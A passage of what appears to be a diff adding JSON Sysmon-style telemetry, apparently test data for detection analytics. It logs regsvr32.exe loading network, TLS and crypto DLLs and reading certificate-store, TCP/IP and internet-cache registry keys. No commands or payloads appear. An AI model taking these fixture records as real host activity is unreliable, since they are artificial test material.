"C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "dpapi.dll", + "image_path": "C:\\Windows\\System32\\dpapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "rsaenh.dll", + "image_path": "C:\\Windows\\System32\\rsaenh.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", + "registry_value": "AuthRoot", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", + "registry_value": "SmartCardRoot", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wininet.dll", + "image_path": "C:\\Windows\\System32\\wininet.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "schannel.dll", + "image_path": "C:\\Windows\\System32\\schannel.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238700016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", + "registry_value": "SCHANNEL", + "timestamp": 131883573238700016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "mskeyprotect.dll", + "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cryptnet.dll", + "image_path": "C:\\Windows\\System32\\cryptnet.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 